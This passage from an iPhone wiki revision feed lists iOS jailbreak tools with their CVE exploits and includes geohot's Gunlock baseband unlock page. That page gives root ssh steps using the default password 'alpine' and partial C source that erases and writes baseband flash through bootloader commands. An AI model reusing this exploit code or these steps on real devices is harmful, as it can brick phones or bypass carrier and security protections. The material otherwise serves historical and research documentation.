* enable-dylibs-to-override-cache - force loading of dynamic libraries from filesystem (where available) instead of the shared cache (overriding libmis)&lt;br /&gt;
* Symbolic linking to AFC ({{cve|2015-5746}})&lt;br /&gt;
* Backup exploit to write to protected regions of the disk ({{cve|2015-5752}})&lt;br /&gt;
* Code signing exploit ({{cve|2015-3802}})&lt;br /&gt;
* Code signing exploit ({{cve|2015-3803}})&lt;br /&gt;
* Code signing exploit ({{cve|2015-3805}})&lt;br /&gt;
* Code signing exploit ({{cve|2015-3806}})&lt;br /&gt;
* IOHIDFamily exploit ({{cve|2015-5774}})&lt;br /&gt;
* Air Traffic exploit to allow attackers to access arbitrary filesystem locations via vectors related to asset handling ({{cve|2015-5766}})&lt;br /&gt;
&lt;br /&gt;
=== [[EtasonJB]] and [[Home Depot]] (8.4.1) === &lt;br /&gt;
&lt;br /&gt;
* OSUnserialize Information leak ({{cve|2016-4655}})&lt;br /&gt;
* Kernel exploit ({{cve|2016-4656}})&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 9.x ==&lt;br /&gt;
=== [[Pangu9]] (9.0 / 9.0.1 / 9.0.2 / 9.1) ===&lt;br /&gt;
* Photos exploit to gain arbitrary unsandboxed file system access as mobile to load outdated DDI. ({{cve|2015-7037}})&lt;br /&gt;
* MobileStorageMounter allowed older DeveloperDiskImages to be mounted, resulting in unsandboxed unsigned code execution due to known weaknesses in entitled executables.  ({{cve|2015-7051}})&lt;br /&gt;
* IOHIDFamily Use-After-Free for kernel information leak / code execution as mobile. ({{cve|2015-6974}})&lt;br /&gt;
* dyld exploit in dyld shared cache handling to override MISValidateSignature in libmis.dylib for persistency ({{cve|2015-7079}})&lt;br /&gt;
* Racing KPP for some of the patches.&lt;br /&gt;
* AMFI MAC Hooks were in non-__const __DATA section, so wouldn't be integrity checked by KPP, allowing to replace MAC hooks required for code-signing. ({{cve|2015-7055}})&lt;br /&gt;
&lt;br /&gt;
=== [[Pangu9]] (9.2 / 9.2.1 / 9.3 / 9.3.1 / 9.3.2 / 9.3.3) ===&lt;br /&gt;
* IOMobileFrameBuffer exploit to execute arbitrary code with kernel privileges. ({{cve|2016-4654}})&lt;br /&gt;
&lt;br /&gt;
=== [[jbme]] (9.2 / 9.2.1 / 9.3 / 9.3.1 / 9.3.2 / 9.3.3) ===&lt;br /&gt;
* Webkit exploit ({{cve|2016-4657}})&lt;br /&gt;
&lt;br /&gt;
=== [[Home Depot]] (9.1-9.3.4) === &lt;br /&gt;
* OSUnserialize Information leak ({{cve|2016-4655}})&lt;br /&gt;
* Kernel exploit ({{cve|2016-4656}})&lt;br /&gt;
&lt;br /&gt;
=== [[JailbreakMe 4.0]] (9.1-9.3.4) === &lt;br /&gt;
* OSUnserialize Information leak ({{cve|2016-4655}})&lt;br /&gt;
* Kernel exploit ({{cve|2016-4656}})&lt;br /&gt;
* Webkit exploit ({{cve|2016-4657}})&lt;br /&gt;
&lt;br /&gt;
=== [[Phœnix]] (9.3.5 / 9.3.6) === &lt;br /&gt;
* OSUnserialize Information leak ({{cve|2016-4655}})&lt;br /&gt;
* mach_port_register Kernel exploit ({{cve|2016-4669}})&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 10.x ==&lt;br /&gt;
&lt;br /&gt;
=== [[extra_recipe+yaluX]] (10.0-10.1.1) ===&lt;br /&gt;
&lt;br /&gt;
* set_dp_control_port exploit to execute arbitrary code with kernel privileges. ({{cve|2016-7644}})&lt;br /&gt;
&lt;br /&gt;
=== [[yalu102]] (10.0.1-10.2) ===&lt;br /&gt;
&lt;br /&gt;
* mach_voucher_extract_attr_recipe_trap memory corruption. ({{cve|2017-2370}})&lt;br /&gt;
&lt;br /&gt;
=== [[doubleH3lix]] (10.0.1 - 10.3.3) ===&lt;br /&gt;
&lt;br /&gt;
* IOSurface Kernel Exploit ({{cve|2017-13861}})&lt;br /&gt;
&lt;br /&gt;
=== [[Meridian]] (10.0 - 10.3.3) ===&lt;br /&gt;
&lt;br /&gt;
* IOSurface Kernel Exploit ({{cve|2017-13861}})&lt;br /&gt;
&lt;br /&gt;
=== [[TotallyNotSpyware]] (10.0 - 10.3.3) ===&lt;br /&gt;
&lt;br /&gt;
* IOSurface Kernel Exploit ({{cve|2017-13861}})&lt;br /&gt;
* WebKit JIT optimization bug exploit ({{cve|2018-4233}})&lt;br /&gt;
&lt;br /&gt;
=== [[H3lix]] (10.0.1 - 10.3.4) ===&lt;br /&gt;
&lt;br /&gt;
* IOSurface Kernel Exploit ({{cve|2017-13861}})&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 11.x ==&lt;br /&gt;
&lt;br /&gt;
===[[Unc0ver]] (11.0-11.4.1)===&lt;br /&gt;
&lt;br /&gt;
11.0 - 11.1.2 &lt;br /&gt;
&lt;br /&gt;
* IOSurface Kernel Exploit ({{cve|2017-13861}})&lt;br /&gt;
&lt;br /&gt;
11.0 - 11.3.1&lt;br /&gt;
&lt;br /&gt;
* mptcp_usr_connectx (multi_path) ({{cve|2018-4241}})&lt;br /&gt;
* getvolattrlist (empty_list) ({{cve|2018-4243}})&lt;br /&gt;
&lt;br /&gt;
11.0 - 11.4.1&lt;br /&gt;
&lt;br /&gt;
* voucher_swap ({{cve|2019-6225}}) &lt;br /&gt;
&lt;br /&gt;
===[[Electra]] (11.0-11.4.1)===&lt;br /&gt;
&lt;br /&gt;
11.0 - 11.1.2&lt;br /&gt;
&lt;br /&gt;
* IOSurface Kernel Exploit ({{cve|2017-13861}})&lt;br /&gt;
&lt;br /&gt;
11.2 - 11.3.1&lt;br /&gt;
&lt;br /&gt;
* mptcp_usr_connectx (multi_path) ({{cve|2018-4241}})&lt;br /&gt;
* getvolattrlist (empty_list) ({{cve|2018-4243}})&lt;br /&gt;
&lt;br /&gt;
11.2 - 11.4.1&lt;br /&gt;
&lt;br /&gt;
* v1ntex ({{cve|2019-6225}})&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 12.x ==&lt;br /&gt;
&lt;br /&gt;
===[[Chimera]] (12.0 - 12.2 / 12.4)===&lt;br /&gt;
&lt;br /&gt;
12.0 - 12.1.2&lt;br /&gt;
&lt;br /&gt;
* voucher_swap ({{cve|2019-6225}}) &lt;br /&gt;
&lt;br /&gt;
12.0 - 12.2/12.4&lt;br /&gt;
&lt;br /&gt;
* SockPuppet ({{cve|2019-8605}})&lt;br /&gt;
&lt;br /&gt;
===[[Unc0ver]] (12.0 - 12.2 / 12.4 / 12.4.1 / 12.4.2 - 12.4.8)===&lt;br /&gt;
&lt;br /&gt;
12.0 - 12.1.2&lt;br /&gt;
&lt;br /&gt;
* voucher_swap ({{cve|2019-6225}}) &lt;br /&gt;
&lt;br /&gt;
12.0 - 12.2/12.4&lt;br /&gt;
&lt;br /&gt;
* SockPuppet ({{cve|2019-8605}})&lt;br /&gt;
&lt;br /&gt;
12.4.1&lt;br /&gt;
&lt;br /&gt;
* AppleAVE2Driver exploit ({{cve|2019-8795}})&lt;br /&gt;
* AppleSPUProfileDriver information leak ({{cve|2019-8794}})&lt;br /&gt;
&lt;br /&gt;
12.4.2 - 12.4.8&lt;br /&gt;
&lt;br /&gt;
* oob_timestamp ({{cve|2020-3837}})&lt;br /&gt;
* cuck00 information leak ({{cve|2020-3836}})&lt;br /&gt;
&lt;br /&gt;
===[[checkra1n]] (12.3 - 12.4.8)===&lt;br /&gt;
&lt;br /&gt;
* [[Checkm8_Exploit | checkm8]] ({{cve|2019-8900}})&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 13.x ==&lt;br /&gt;
&lt;br /&gt;
===[[Unc0ver]] (13.0 - 13.5.5~b1 (excluding 13.5.1))===&lt;br /&gt;
&lt;br /&gt;
13.0 - 13.3 (before version 5.0.0)&lt;br /&gt;
&lt;br /&gt;
* oob_timestamp ({{cve|2020-3837}})&lt;br /&gt;
* cuck00 information leak ({{cve|2020-3836}})&lt;br /&gt;
&lt;br /&gt;
13.0 - 13.5.5~b1 (excluding 13.5.1) (since version 5.0.0)&lt;br /&gt;
&lt;br /&gt;
* tachy0n (LightSpeed) ({{cve|2020-9859}})&lt;br /&gt;
&lt;br /&gt;
===[[Odyssey]] (13.0 - 13.7)===&lt;br /&gt;
&lt;br /&gt;
13.0 - 13.5&lt;br /&gt;
&lt;br /&gt;
* tardy0n (LightSpeed) ({{cve|2020-9859}})&lt;br /&gt;
&lt;br /&gt;
13.5.1 - 13.7 (for devices with SoCs other than the A8 and A9)&lt;br /&gt;
&lt;br /&gt;
* FreeTheSandbox_LPE_POC_13.7&lt;br /&gt;
&lt;br /&gt;
13.5.1 - 13.7 (for devices with A8/A9 SoCs)&lt;br /&gt;
&lt;br /&gt;
* oob_events ({{cve|2020-27905}}), ({{cve|2020-9964}})&lt;br /&gt;
&lt;br /&gt;
===[[checkra1n]] (13.0 - 13.7)===&lt;br /&gt;
&lt;br /&gt;
* [[Checkm8_Exploit | checkm8]] ({{cve|2019-8900}})&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 14.x ==&lt;br /&gt;
&lt;br /&gt;
===[[checkra1n]] (14.0 - 14.4)===&lt;br /&gt;
&lt;br /&gt;
* [[Checkm8_Exploit | checkm8]] ({{cve|2019-8900}})&lt;br /&gt;
&lt;br /&gt;
===[[unc0ver]] (14.0 - 14.3)===&lt;br /&gt;
&lt;br /&gt;
* ivac entry use-after-free ({{cve|2021-1782}})&lt;/div&gt;</summary>
		<author><name>Inflatable Man</name></author>
		
	</entry>
	<entry>
		<id>https://www.theiphonewiki.com/w/index.php?title=Gunlock&amp;diff=111468</id>
		<title>Gunlock</title>
		<link rel="alternate" type="text/html" href="https://www.theiphonewiki.com/w/index.php?title=Gunlock&amp;diff=111468"/>
		<updated>2021-03-22T00:10:53Z</updated>

		<summary type="html">&lt;p&gt;Inflatable Man: /* Instructions */ Remove broken link&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;It was the first implementation of the [[Minus 0x20000 with Back Extend Erase]] exploit. In the first version of this unlock, Airplane Mode had to be switched on. If it was not, your phone would enter a boot loop upon updating to 1.1.3.&lt;br /&gt;
&lt;br /&gt;
== Credit ==&lt;br /&gt;
&lt;br /&gt;
[[User:Geohot|geohot]]&lt;br /&gt;
&lt;br /&gt;
== Instructions ==&lt;br /&gt;
# Download gunlock and the secpack from http://iphonejtag.blogspot.com/, and the 4.02.13 fls from http://george.zjlotto.com/index.php/baseband/&lt;br /&gt;
# Downgrade your phone to 1.0.2. See all the great tutorials online to do this. Your baseband won't be downgraded, this is normal. This will probably work on other versions too, but 1.0.2 doesn't lose wifi on bb access.&lt;br /&gt;
# Kill CommCenter and run &amp;quot;gunlock secpack ICE04.02.13_G.fls&amp;quot;&lt;br /&gt;
# Reload CommCenter. For some reason my phone was in brick mode. Use the elite team bricktool to get out.&lt;br /&gt;
# Enjoy your 1.1.2 OTB unlocked iPhone&lt;br /&gt;
&lt;br /&gt;
if you dont want to downgrade to 1.0.2 try&lt;br /&gt;
&lt;br /&gt;
#unlock and the secpack from http://iphonejtag.blogspot.com/ or the blog and the 4.02.13 fls from http://george.zjlotto.com/index.php/baseband/&lt;br /&gt;
# Upgrade to 1.1.2 and jailbreak ( must not be on 1.1.3 )&lt;br /&gt;
# install ssh&lt;br /&gt;
#upload all downloaded files to /usr/bin and set all permissions to 755&lt;br /&gt;
#chmod +x gunlock&lt;br /&gt;
#chmod +x gunlock.c&lt;br /&gt;
#Log to your phone trough terminal and follow this commands one by one:&lt;br /&gt;
#ssh root@iPhone ip address&lt;br /&gt;
#password: alpine&lt;br /&gt;
#launchctl unload /System/Library/LaunchDaemons/com.apple.CommCenter.plist&lt;br /&gt;
#cd /usr/bin&lt;br /&gt;
#/gunlock secpack ICE04.02.13_G.fls&lt;br /&gt;
#launchctl load /System/Library/LaunchDaemons/com.apple.CommCenter.plist&lt;br /&gt;
&lt;br /&gt;
== version info ==&lt;br /&gt;
&lt;br /&gt;
1.1.2 [http://hotfile.com/dl/77798761/636ab70/1.1.2.zip.html] &lt;br /&gt;
&lt;br /&gt;
1.1.3 [http://hotfile.com/dl/77799157/b1a00c2/1.1.3.zip.html]&lt;br /&gt;
&lt;br /&gt;
the exploit was updated for 1.1.4 ( removed the need for a new secpack ) [http://winandmac.com/files/iphone/114unlock.rar] or [http://hotfile.com/dl/77799557/cfd78b6/1.1.4.zip.html]&lt;br /&gt;
&lt;br /&gt;
== Road blocks ==&lt;br /&gt;
* Send the 1.1.3 [[secpack]] to erase 1.1.2&lt;br /&gt;
* Second exploit, the fake secpack erase range&lt;br /&gt;
** If a valid [[secpack]] is present in 0x3C0000, the phone won't boot. And since endpack doesn't work, I needed to find another way.&lt;br /&gt;
&lt;br /&gt;
== source code ==&lt;br /&gt;
&lt;br /&gt;
 //geohot's 112 otb unlocker&lt;br /&gt;
 //this code is GPLed&lt;br /&gt;
 #include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
 #include &amp;lt;stdlib.h&amp;gt;&lt;br /&gt;
 #include &amp;lt;termios.h&amp;gt;&lt;br /&gt;
 #include &amp;lt;unistd.h&amp;gt;&lt;br /&gt;
 #include &amp;lt;fcntl.h&amp;gt;&lt;br /&gt;
 #include &amp;lt;IOKit/IOKitLib.h&amp;gt;&lt;br /&gt;
 #include &amp;lt;sys/ioctl.h&amp;gt;&lt;br /&gt;
 #include &amp;lt;strings.h&amp;gt;&lt;br /&gt;
 #include &amp;lt;errno.h&amp;gt;&lt;br /&gt;
 #include &amp;lt;mach/mach_time.h&amp;gt;&lt;br /&gt;
 struct termios term;&lt;br /&gt;
 int hlen,t,u,fp;&lt;br /&gt;
 unsigned char *data, *secpack;&lt;br /&gt;
 FILE *f;&lt;br /&gt;
 int adrcount;&lt;br /&gt;
 int openport(int speed)&lt;br /&gt;
 {&lt;br /&gt;
  int fd = open(&amp;quot;/dev/tty.baseband&amp;quot;, O_RDWR | 0x20000 | O_NOCTTY);&lt;br /&gt;
  unsigned int blahnull = 0;&lt;br /&gt;
  unsigned int handshake = TIOCM_DTR | TIOCM_RTS | TIOCM_CTS | TIOCM_DSR;&lt;br /&gt;
  if(fd == -1)&lt;br /&gt;
  {&lt;br /&gt;
    fprintf(stderr, &amp;quot;%i(%s)\n&amp;quot;, errno, strerror(errno));&lt;br /&gt;
    exit(1);&lt;br /&gt;
  }&lt;br /&gt;
  ioctl(fd, 0x2000740D);&lt;br /&gt;
  fcntl(fd, 4, 0);&lt;br /&gt;
  tcgetattr(fd, &amp;amp;term);&lt;br /&gt;
  ioctl(fd, 0x8004540A, &amp;amp;blahnull);&lt;br /&gt;
  cfsetspeed(&amp;amp;term, speed);&lt;br /&gt;
  cfmakeraw(&amp;amp;term);&lt;br /&gt;
  term.c_cc[VMIN] = 0;&lt;br /&gt;
  term.c_cc[VTIME] = 5;&lt;br /&gt;
  term.c_iflag = (term.c_iflag &amp;amp; 0xFFFFF0CD) | 5;&lt;br /&gt;
  term.c_oflag =  term.c_oflag &amp;amp; 0xFFFFFFFE;&lt;br /&gt;
  term.c_cflag = (term.c_cflag &amp;amp; 0xFFFC6CFF) | 0x3CB00;&lt;br /&gt;
  term.c_lflag =  term.c_lflag &amp;amp; 0xFFFFFA77;&lt;br /&gt;
  term.c_cflag = (term.c_cflag &amp;amp; ~CSIZE) | CS8;&lt;br /&gt;
  term.c_cflag &amp;amp;= ~PARENB;&lt;br /&gt;
  term.c_lflag &amp;amp;= ~ECHO;&lt;br /&gt;
  tcsetattr(fd, TCSANOW, &amp;amp;term);&lt;br /&gt;
  ioctl(fd, TIOCSDTR);&lt;br /&gt;
  ioctl(fd, TIOCCDTR);&lt;br /&gt;
  ioctl(fd, TIOCMSET, &amp;amp;handshake);&lt;br /&gt;
  return fd;&lt;br /&gt;
 }&lt;br /&gt;
 void resetbaseband()&lt;br /&gt;
 {&lt;br /&gt;
  kern_return_t   result;&lt;br /&gt;
  mach_port_t     masterPort;&lt;br /&gt;
  result = IOMasterPort(MACH_PORT_NULL, &amp;amp;masterPort);&lt;br /&gt;
  CFMutableDictionaryRef matchingDict = IOServiceMatching(&amp;quot;AppleBaseband&amp;quot;);  &lt;br /&gt;
  io_service_t service = IOServiceGetMatchingService(kIOMasterPortDefault, matchingDict);&lt;br /&gt;
  io_connect_t conn;&lt;br /&gt;
  result = IOServiceOpen(service, mach_task_self(), 0, &amp;amp;conn);&lt;br /&gt;
  result = IOConnectCallScalarMethod(conn, 0, 0, 0, 0, 0);&lt;br /&gt;
  IOServiceClose(conn);&lt;br /&gt;
 }&lt;br /&gt;
 void getheader(unsigned int timeout)&lt;br /&gt;
 {&lt;br /&gt;
 fd_set nfp;&lt;br /&gt;
 FD_ZERO(&amp;amp;nfp);&lt;br /&gt;
 FD_SET(fp, &amp;amp;nfp);&lt;br /&gt;
 struct timeval tv;&lt;br /&gt;
 tv.tv_sec=0;&lt;br /&gt;
 tv.tv_usec=timeout*1000;&lt;br /&gt;
 hlen=0;&lt;br /&gt;
 while(select(fp+1,&amp;amp;nfp,0,0,&amp;amp;tv)&amp;gt;0)&lt;br /&gt;
 {&lt;br /&gt;
 hlen+=read(fp,data+hlen, 0x10064-hlen);&lt;br /&gt;
 //printf(&amp;quot;Attempting to read[%d]...%x %x\n&amp;quot;,hlen,data[0],data[1]);&lt;br /&gt;
 }&lt;br /&gt;
 }&lt;br /&gt;
 void getcommand()	//will return when done&lt;br /&gt;
 {&lt;br /&gt;
 int maxlength=6;&lt;br /&gt;
 hlen=0;&lt;br /&gt;
 while(hlen&amp;lt;maxlength)&lt;br /&gt;
 {&lt;br /&gt;
 hlen+=read(fp,data+hlen, 6);&lt;br /&gt;
 }&lt;br /&gt;
 maxlength+=data[5]*0x100+data[4]+4;	//2 for checksum and 2 for end&lt;br /&gt;
 while(hlen&amp;lt;maxlength)&lt;br /&gt;
 {&lt;br /&gt;
 hlen+=read(fp,data+hlen, 0x10064-hlen);&lt;br /&gt;
 }&lt;br /&gt;
 }&lt;br /&gt;
 struct termios options;&lt;br /&gt;
 void openbaseband()&lt;br /&gt;
 {&lt;br /&gt;
 int t1=0;&lt;br /&gt;
 int t2=0x126;&lt;br /&gt;
 fp=open(&amp;quot;/dev/tty.baseband&amp;quot;,0x20002);&lt;br /&gt;
 ioctl(fp,0x2000740D);&lt;br /&gt;
 fcntl(fp,4,0);&lt;br /&gt;
 tcgetattr(fp,&amp;amp;options);&lt;br /&gt;
 ioctl(fp,0x8004540A,&amp;amp;t1);&lt;br /&gt;
 cfsetspeed(&amp;amp;options,115200);&lt;br /&gt;
 cfmakeraw(&amp;amp;options);&lt;br /&gt;
 options.c_cc[16]=0;&lt;br /&gt;
 options.c_cc[17]=5;&lt;br /&gt;
 options.c_iflag=(options.c_iflag | 0x5) &amp;amp; 0xFFFFF0CD;&lt;br /&gt;
 options.c_oflag=options.c_oflag &amp;amp; 0xFFFFFFFE;&lt;br /&gt;
 options.c_cflag=(options.c_cflag | 0x3CB00) &amp;amp; 0xFFFFEFFF;&lt;br /&gt;
 options.c_lflag=options.c_lflag &amp;amp; 0xFFFFFA77;&lt;br /&gt;
 tcsetattr(fp,0,&amp;amp;options);&lt;br /&gt;
 ioctl(fp,0x20007479);&lt;br /&gt;
 ioctl(fp,0x20007478);&lt;br /&gt;
 ioctl(fp,0x8004746D,&amp;amp;t2);&lt;br /&gt;
 printf(&amp;quot;Opened: /dev/tty.baseband\n&amp;quot;);&lt;br /&gt;
 }&lt;br /&gt;
 void printbuffer()&lt;br /&gt;
 {&lt;br /&gt;
 for(t=0;t&amp;lt;hlen;t++)&lt;br /&gt;
 {&lt;br /&gt;
 if(t!=0&amp;amp;&amp;amp;t%16==0) printf(&amp;quot;\n&amp;quot;);&lt;br /&gt;
 printf(&amp;quot;%2.2X &amp;quot;, data[t]);&lt;br /&gt;
 }&lt;br /&gt;
 if(hlen&amp;gt;0)&lt;br /&gt;
 printf(&amp;quot;\n&amp;quot;);&lt;br /&gt;
 }&lt;br /&gt;
 struct cmd_pkt{&lt;br /&gt;
 unsigned short int w02;&lt;br /&gt;
 unsigned short int cmd;&lt;br /&gt;
 unsigned short int data_size;&lt;br /&gt;
 };&lt;br /&gt;
 struct cmd_pkt_end{&lt;br /&gt;
 unsigned short int checksum;&lt;br /&gt;
 unsigned short int w03;&lt;br /&gt;
 };&lt;br /&gt;
 struct cmd_pkt mycmdpkt;&lt;br /&gt;
 struct cmd_pkt_end mycmdpktend;&lt;br /&gt;
 void cmd_write()&lt;br /&gt;
 {&lt;br /&gt;
 mycmdpkt.w02=2;&lt;br /&gt;
 mycmdpktend.w03=3;&lt;br /&gt;
 mycmdpktend.checksum=0;&lt;br /&gt;
 for(t=0;t&amp;lt;mycmdpkt.data_size;t++)&lt;br /&gt;
 {&lt;br /&gt;
 mycmdpktend.checksum+=data[t];&lt;br /&gt;
 }&lt;br /&gt;
 mycmdpktend.checksum+=mycmdpkt.cmd+mycmdpkt.data_size;&lt;br /&gt;
 write(fp,&amp;amp;mycmdpkt,6);&lt;br /&gt;
 write(fp,data,mycmdpkt.data_size);&lt;br /&gt;
 write(fp,&amp;amp;mycmdpktend,4);&lt;br /&gt;
 }&lt;br /&gt;
 void usage()&lt;br /&gt;
 {&lt;br /&gt;
 printf(&amp;quot;geohot's 112 otb unlocker...\n&amp;quot;);&lt;br /&gt;
 }&lt;br /&gt;
 int enterinteractive()&lt;br /&gt;
 {&lt;br /&gt;
 tcgetattr(fp,&amp;amp;options);			//baud rate upped&lt;br /&gt;
 cfsetspeed(&amp;amp;options,115200);&lt;br /&gt;
 tcsetattr(fp,0,&amp;amp;options);&lt;br /&gt;
 printf(&amp;quot;Waiting for data...\n&amp;quot;);&lt;br /&gt;
 do&lt;br /&gt;
 {&lt;br /&gt;
 data[0]=0x60; data[1]=0x0D;&lt;br /&gt;
 if(write(fp,data,2)==-1)&lt;br /&gt;
  {&lt;br /&gt;
 printf(&amp;quot;Can't write\n&amp;quot;);&lt;br /&gt;
 return -1;&lt;br /&gt;
 }&lt;br /&gt;
 printf(&amp;quot;Attempt...\n&amp;quot;);&lt;br /&gt;
 getheader(500);&lt;br /&gt;
 } while(hlen==0||data[0]!=0xb);&lt;br /&gt;
 printf(&amp;quot;Got Header: %d %2.2x %2.2x\n&amp;quot;,hlen, data[0], data[1]);&lt;br /&gt;
 return 0;&lt;br /&gt;
 }&lt;br /&gt;
 void increasebaudrate()&lt;br /&gt;
 {&lt;br /&gt;
 printf(&amp;quot;Increasing baud rate...\n&amp;quot;);&lt;br /&gt;
 mycmdpkt.cmd=0x82;&lt;br /&gt;
 mycmdpkt.data_size=4;&lt;br /&gt;
 data[0]=0x00; data[1]=0x10; data[2]=0x0E; data[3]=0x00;		//115200 bps&lt;br /&gt;
 cmd_write();&lt;br /&gt;
 getcommand();&lt;br /&gt;
 printbuffer();&lt;br /&gt;
 tcgetattr(fp,&amp;amp;options);			//baud rate upped&lt;br /&gt;
 cfsetspeed(&amp;amp;options,921600);&lt;br /&gt;
 tcsetattr(fp,0,&amp;amp;options);&lt;br /&gt;
 }&lt;br /&gt;
 void getflashid()&lt;br /&gt;
 {&lt;br /&gt;
 printf(&amp;quot;Get flash ID\n&amp;quot;);&lt;br /&gt;
 mycmdpkt.cmd=0x801;&lt;br /&gt;
 mycmdpkt.data_size=0;&lt;br /&gt;
 cmd_write();&lt;br /&gt;
 getcommand();&lt;br /&gt;
 //printbuffer();&lt;br /&gt;
 }&lt;br /&gt;
 void cfistage1()&lt;br /&gt;
 {&lt;br /&gt;
 printf(&amp;quot;CFI Stage 1\n&amp;quot;);&lt;br /&gt;
 mycmdpkt.cmd=0x84;&lt;br /&gt;
 mycmdpkt.data_size=2;&lt;br /&gt;
 data[0]=0; data[1]=0;&lt;br /&gt;
 cmd_write();&lt;br /&gt;
 getcommand();&lt;br /&gt;
 //printbuffer();&lt;br /&gt;
 }&lt;br /&gt;
 void cfistage2()&lt;br /&gt;
 {&lt;br /&gt;
 printf(&amp;quot;CFI Stage 2\n&amp;quot;);&lt;br /&gt;
 mycmdpkt.cmd=0x85;&lt;br /&gt;
 mycmdpkt.data_size=0;&lt;br /&gt;
 cmd_write();&lt;br /&gt;
 getcommand();&lt;br /&gt;
 //printbuffer();&lt;br /&gt;
 }&lt;br /&gt;
 void address(unsigned int addr, int print)&lt;br /&gt;
 {&lt;br /&gt;
 adrcount=addr;&lt;br /&gt;
 if(print==0) printf(&amp;quot;Address to 0x%X  &amp;quot;,addr);&lt;br /&gt;
 mycmdpkt.cmd=0x802;&lt;br /&gt;
 mycmdpkt.data_size=4;&lt;br /&gt;
 memcpy(data,&amp;amp;addr,4);&lt;br /&gt;
 cmd_write();&lt;br /&gt;
 getcommand();&lt;br /&gt;
 if(print==0) printbuffer();&lt;br /&gt;
 }&lt;br /&gt;
 void sendsecpack(char *secpack)&lt;br /&gt;
 {&lt;br /&gt;
 printf(&amp;quot;Sending secpack... &amp;quot;);&lt;br /&gt;
 mycmdpkt.cmd=0x204;&lt;br /&gt;
 mycmdpkt.data_size=0x800;&lt;br /&gt;
 memcpy(data,secpack,0x800);&lt;br /&gt;
 cmd_write();&lt;br /&gt;
 getcommand();&lt;br /&gt;
 printbuffer();&lt;br /&gt;
 }&lt;br /&gt;
 void bbread(short int len)&lt;br /&gt;
 {&lt;br /&gt;
 mycmdpkt.cmd=0x803;&lt;br /&gt;
 mycmdpkt.data_size=2;&lt;br /&gt;
 memcpy(data,&amp;amp;len,2);&lt;br /&gt;
 cmd_write();&lt;br /&gt;
 getcommand();&lt;br /&gt;
 printbuffer();&lt;br /&gt;
 }&lt;br /&gt;
 void bbwrite(unsigned int size, int print)	//put crap in data already&lt;br /&gt;
 {&lt;br /&gt;
 if(print==0) printf(&amp;quot;Writing: 0x%X  &amp;quot;,adrcount);&lt;br /&gt;
 mycmdpkt.cmd=0x804;&lt;br /&gt;
 mycmdpkt.data_size=size;&lt;br /&gt;
 cmd_write();&lt;br /&gt;
 getcommand();&lt;br /&gt;
 if(print==0) printbuffer();&lt;br /&gt;
 adrcount+=size;&lt;br /&gt;
 }&lt;br /&gt;
 int erase(unsigned int start, unsigned int end, int debug)&lt;br /&gt;
 {&lt;br /&gt;
 printf(&amp;quot;Erasing: 0x%X-0x%X  &amp;quot;,start, end);&lt;br /&gt;
 mycmdpkt.cmd=0x805;&lt;br /&gt;
 mycmdpkt.data_size=8;&lt;br /&gt;
 memcpy(data,&amp;amp;start,0x4);&lt;br /&gt;
 memcpy(&amp;amp;data[4],&amp;amp;end,0x4);&lt;br /&gt;
 cmd_write();&lt;br /&gt;
 getcommand();&lt;br /&gt;
 printbuffer();&lt;br /&gt;
 printf(&amp;quot;Waiting for erase to finish...\n&amp;quot;);&lt;br /&gt;
 do{&lt;br /&gt;
 mycmdpkt.cmd=0x806;&lt;br /&gt;
 mycmdpkt.data_size=2;&lt;br /&gt;
 data[0]=0; data[1]=0;&lt;br /&gt;
 cmd_write();&lt;br /&gt;
 getcommand();&lt;br /&gt;
 if(debug==0) printbuffer();&lt;br /&gt;
 usleep(100000);&lt;br /&gt;
 }while(data[6]==0);&lt;br /&gt;
 if(debug!=0) printbuffer();&lt;br /&gt;
 if(data[9]!=0x31) &lt;br /&gt;
 {&lt;br /&gt;
 //printf(&amp;quot;Erase failed!\n&amp;quot;);&lt;br /&gt;
 return -1;&lt;br /&gt;
 }&lt;br /&gt;
 return 0;&lt;br /&gt;
 }&lt;br /&gt;
 void endsecpack()&lt;br /&gt;
 {&lt;br /&gt;
 printf(&amp;quot;End Secpack  &amp;quot;);&lt;br /&gt;
 mycmdpkt.cmd=0x205;&lt;br /&gt;
 mycmdpkt.data_size=2;&lt;br /&gt;
 data[0]=0; data[1]=0;&lt;br /&gt;
 cmd_write();&lt;br /&gt;
 getcommand();&lt;br /&gt;
 printbuffer();&lt;br /&gt;
 }&lt;br /&gt;
 void readmem(unsigned int addr)		//you need a patched bootloader :)&lt;br /&gt;
 {&lt;br /&gt;
 //printf(&amp;quot;procx102\n&amp;quot;);&lt;br /&gt;
 unsigned int memdata;&lt;br /&gt;
 mycmdpkt.cmd=0x102;&lt;br /&gt;
 mycmdpkt.data_size=4;&lt;br /&gt;
 memcpy(data,&amp;amp;addr,0x4);&lt;br /&gt;
 cmd_write();&lt;br /&gt;
 getcommand();&lt;br /&gt;
 memcpy(&amp;amp;memdata,&amp;amp;data[6],0x4);&lt;br /&gt;
 printf(&amp;quot;[0x%X]=0x%X\n&amp;quot;,addr,memdata);&lt;br /&gt;
 //printbuffer();&lt;br /&gt;
 }&lt;br /&gt;
 #define patchloc 0x2359d4	//this is for 4.02.13&lt;br /&gt;
 int main(int argc, char *argv[])&lt;br /&gt;
 {&lt;br /&gt;
 usage();&lt;br /&gt;
 if(argc&amp;lt;3) { printf(&amp;quot;usage: %s &amp;lt;113secpack&amp;gt; &amp;lt;112fls&amp;gt;\n&amp;quot;,argv[0]); return -1;}&lt;br /&gt;
 resetbaseband();&lt;br /&gt;
 fp = openport(115200);&lt;br /&gt;
 //FILE *secpack=fopen(argv[1],&amp;quot;rb&amp;quot;);&lt;br /&gt;
 data=(unsigned char *)malloc(70000);&lt;br /&gt;
 if(enterinteractive()==-1) return -1;&lt;br /&gt;
 printf(&amp;quot;Bootloader version: %s\n&amp;quot;,&amp;amp;data[0xD]);&lt;br /&gt;
 if(data[5]!=4)&lt;br /&gt;
 {&lt;br /&gt;
 printf(&amp;quot;Incorrect bootloader version\n&amp;quot;);&lt;br /&gt;
 return -1;&lt;br /&gt;
 }&lt;br /&gt;
 increasebaudrate();&lt;br /&gt;
 cfistage1();&lt;br /&gt;
 cfistage2();&lt;br /&gt;
 char *rsecpack=(char *)malloc(0x800);&lt;br /&gt;
